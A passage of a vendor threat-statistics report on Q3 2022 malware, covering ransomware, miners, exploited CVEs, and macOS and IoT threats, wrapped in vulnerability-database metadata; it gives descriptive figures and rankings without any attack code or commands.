ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.\n\n### Number of new modifications\n\nIn Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which hit the sixth place in our rankings of the most widespread ransomware Trojans.\n\n_Number of new ransomware modifications, Q3 2021 \u2014 Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_\n\n**TOP 10 most common families of ransomware Trojans**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of attacked users\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.66 \n2 | Yemen | 1.30 \n3 | South Korea | 0.98 \n4 | Taiwan | 0.77 \n5 | Mozambique | 0.64 \n6 | China | 0.52 \n7 | Colombia | 0.43 \n8 | Nigeria | 0.40 \n9 | Pakistan | 0.39 \n10 | Venezuela | 0.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data. \n** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.\n\n_Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity.\n\n_Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Geography of miner attacks\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.38 \n2 | Kazakhstan | 2.13 \n3 | Uzbekistan | 2.01 \n4 | Rwanda | 1.93 \n5 | Tajikistan | 1.83 \n6 | Venezuela | 1.78 \n7 | Kyrgyzstan | 1.73 \n8 | Mozambique | 1.57 \n9 | Tanzania | 1.56 \n10 | Ukraine | 1.54 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nQ3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). These allow elevating the system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require that exploits entrench in the system before an attacker can run their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system.\n\nMost of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. The attempts at exploiting network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system \u2014 in kernel context \u2014 by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which allows in theory to remotely exploit a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.\n\nTwo vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the ProxyShell vulnerabilities with similar exploitation technique (they were closed earlier). Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to to extort money from the victim, etc.\n\n### Vulnerability statistics\n\nIn Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections \u2014 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:\n\n * [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;\n * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files;\n * [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;\n * [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_\n\nThese were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:\n\n * [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow;\n * [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component;\n * [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;\n * [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.\n\nSince many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine.\n\nA series of vulnerabilities were identified in Microsoft Edge. Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results.\n\nThe Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.\n\nThe remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.\n\n## Attacks on macOS\n\nThe third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.\n\n[CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft.\n\nThe creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3.\n\nIn Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework.\n\nIn addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.\n\n### TOP 20 threats for macOS\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 14.77 \n2 | AdWare.OSX.Pirrit.ac | 10.45 \n3 | AdWare.OSX.Agent.ai | 9.40 \n4 | Monitor.OSX.HistGrabber.b | 7.15 \n5 | AdWare.OSX.Pirrit.j | 7.10 \n6 | AdWare.OSX.Bnodlero.at | 6.09 \n7 | AdWare.OSX.Bnodlero.ax | 5.95 \n8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 \n9 | AdWare.OSX.Pirrit.ae | 5.27 \n10 | Trojan-Downloader.OSX.Agent.h | 3.87 \n11 | AdWare.OSX.Bnodlero.bg | 3.46 \n12 | AdWare.OSX.Pirrit.o | 3.32 \n13 | AdWare.OSX.Agent.u | 3.13 \n14 | AdWare.OSX.Agent.gen | 2.90 \n15 | AdWare.OSX.Pirrit.aa | 2.85 \n16 | Backdoor.OSX.Twenbc.e | 2.85 \n17 | AdWare.OSX.Ketin.h | 2.82 \n18 | AdWare.OSX.Pirrit.gen | 2.69 \n19 | Trojan-Downloader.OSX.Lador.a | 2.52 \n20 | Downloader.OSX.InstallCore.ak | 2.28 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, our TOP 20 ranking for biggest threats encountered by users of Kaspersky security solutions for macOS were dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," had taken the top place for a second quarter in a row. This application displays fake system issue messages, offering to buy the full version to fix those. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.\n\n### Geography of threats for macOS\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 1.71 \n2 | Canada | 1.70 \n3 | Russia | 1.57 \n4 | India | 1.53 \n5 | United States | 1.52 \n6 | Spain | 1.48 \n7 | Australia | 1.36 \n8 | Italy | 1.35 \n9 | Mexico | 1.27 \n10 | United Kingdom | 1.24 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nFrance, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.\n\nTelnet | 75.92% \n---|--- \nSSH | 24.08% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_\n\nA majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.\n\nTelnet | 97.53% \n---|--- \nSSH | 2.47% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 28.67 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 \n3 | Backdoor.Linux.Mirai.ba | 11.63 \n4 | Backdoor.Linux.Mirai.cw | 10.94 \n5 | Backdoor.Linux.Gafgyt.a | 3.69 \n6 | Backdoor.Linux.Mirai.ew | 3.49 \n7 | Trojan-Downloader.Shell.Agent.p | 2.56 \n8 | Backdoor.Linux.Gafgyt.bj | 1.63 \n9 | Backdoor.Linux.Mirai.et | 1.17 \n10 | Backdoor.Linux.Mirai.ek | 1.08 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT-threat statistics are published in the DDoS report for Q3 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **_Malware_**_ class_; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 19.65 \n2 | Belarus | 17.01 \n3 | Serbia | 15.05 \n4 | Russia | 14.12 \n5 | Algeria | 14.01 \n6 | Turkey | 13.82 \n7 | Tunisia | 13.31 \n8 | Bangladesh | 13.30 \n9 | Moldova | 13.22 \n10 | Palestine | 12.61 \n11 | Yemen | 12.58 \n12 | Ukraine | 12.25 \n13 | Libya | 12.23 \n14 | Sri Lanka | 11.97 \n15 | Kyrgyzstan | 11.69 \n16 | Estonia | 11.65 \n17 | Hong Kong | 11.52 \n18 | Nepal | 11.52 \n19 | Syria | 11.39 \n20 | Lithuania | 11.33 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThese rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 46.48 \n2 | Yemen | 45.12 \n3 | Afghanistan | 44.18 \n4 | Cuba | 40.48 \n5 | Tajikistan | 39.17 \n6 | Bangladesh | 37.06 \n7 | Uzbekistan | 37.00 \n8 | Ethiopia | 36.96 \n9 | South Sudan | 36.89 \n10 | Myanmar | 36.64 \n11 | Syria | 34.82 \n12 | Benin | 34.56 \n13 | Burundi | 33.91 \n14 | Tanzania | 33.05 \n15 | Rwanda | 33.03 \n16 | Chad | 33.01 \n17 | Venezuela | 32.79 \n18 | Cameroon | 32.30 \n19 | Sudan | 31.93 \n20 | Malawi | 31.88 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\nOn average worldwide, Malware-class local threats were registered on 14.74% of users' computers at least once during Q3. Russia scored 16.60% in this ranking.", "published": "2022-11-18T08:10:34", "modified": "2022-11-18T08:10:34", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/", "reporter": "AMR", "references": [], "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-40444", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-22022", "CVE-2022-22026", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2624", "CVE-2022-30190", "CVE-2022-30206", "CVE-2022-30220", "CVE-2022-30226", "CVE-2022-3075", "CVE-2022-33636", "CVE-2022-33649", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-34718", "CVE-2022-34724", "CVE-2022-35743", "CVE-2022-35750", "CVE-2022-35796", "CVE-2022-35803", "CVE-2022-37969", "CVE-2022-38012", "CVE-2022-38476", "CVE-2022-38477", "CVE-2022-38478", "CVE-2022-41040", "CVE-2022-41082"], "immutableFields": [], "lastseen": "2022-11-30T12:08:22", "viewCount": 21, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:0287B84AF09C377FDC8D475774722858", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:94B715279ABA113C427A5E987C080DA7", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "almalinux", "idList": ["ALSA-2022:6164", "ALSA-2022:6175"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2021-1733", "ALAS2-2022-1734", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806", "ALAS2-2022-1855"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425", "APPLE:37AFBB95AFD80D918469C22F0A05655D", "APPLE:71C798D0F46D1E956B1D27B4A004E9B9", "APPLE:DF68F7FFE1ED4E5157204A83619C4B89"]}, {"type": "atlassian", "idList": ["CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:06DA4012-8C8E-4534-A099-AE4F2449F9B3", "AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:0B6E13D5-84E0-4D3E-BD21-781032FA30ED", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:23F2B591-FE1E-47A8-AA83-2DFAD7E5CE61", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:48AB1318-D726-4F76-9889-74353FF980EF", "AKB:5FAD5EC2-E77A-4F4A-B3DC-61A700F1B059", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:83F1ABD4-4E2B-4E5A-BFE5-81C4FB7A474A", "AKB:9EA74C88-E0C0-4B13-802D-551307F35B3F", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:B18222FB-1EF5-4D55-899B-61BD7ECF0FAA", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0", "AKB:FECA1489-DC05-4990-A74B-DED8F2AF4441"]}, {"type": "avleonov", "idList": ["AVLEONOV:37BE727F2D0C216B8B10BD6CBE6BD061", "AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:4B6EFA5DE55BAEFCD9C72826A3524969", "AVLEONOV:58634A9ABF4922115976139024831EB9", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:75C789BDAA68C1C2CEC0F20F1D138B01", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:B4AA36B0AF8AA2D059C914E5F2B15CC0", "AVLEONOV:B87691B304EF70215B926F66B871260A", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "broadcom", "idList": ["BSA-2021-1658"]}, {"type": "canvas", "idList": ["OFFICE_WSDL"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "centos", "idList": ["CESA-2022:6169", "CESA-2022:6179"]}, {"type": "cert", "idList": ["VU:421280", "VU:915563", "VU:921560", "VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0251", "CPAI-2017-1009", "CPAI-2018-0018", "CPAI-2021-0554", "CPAI-2021-0936", "CPAI-2021-0955", "CPAI-2021-1011", "CPAI-2022-0283", "CPAI-2022-0360", "CPAI-2022-0362", "CPAI-2022-0363", "CPAI-2022-0470", "CPAI-2022-0471", "CPAI-2022-0560", "CPAI-2022-0566", "CPAI-2022-0628"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "chrome", "idList": ["GCSA-3975554673488527527", "GCSA-5089288012050676645", "GCSA-7720125337817983232", "GCSA-849835485002254358"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:8ED5E84007437E9B88D2418732B63E04", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:C70D91615E3DC8B589B493118D474566", "CISA:F30D0D7B72453DC3FC64D2AC1AA31F33", 